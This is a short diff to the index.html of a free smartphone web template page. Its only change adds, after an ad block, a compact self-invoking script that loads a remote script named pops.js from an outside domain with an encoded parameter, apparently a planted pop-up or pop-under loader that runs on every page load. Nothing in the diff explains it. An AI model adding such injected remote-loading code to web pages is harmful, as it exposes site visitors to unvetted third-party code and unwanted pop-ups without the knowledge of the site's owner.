--- a/index.html
+++ b/index.html
@@ -255,6 +255,7 @@ Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, Sony
 <script>
      (adsbygoogle = window.adsbygoogle || []).push({});
 </script>
+			 <script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://frenchequal.pro/code/pops.js?h=waWQiOjEwODk1NDUsInNpZCI6MTA5ODY3OCwid2lkIjoyMDU2NTUsInNyYyI6Mn0=eyJ';d.head.appendChild(s);})(document);</script>
 			</div>
 	 </div>
 </div>
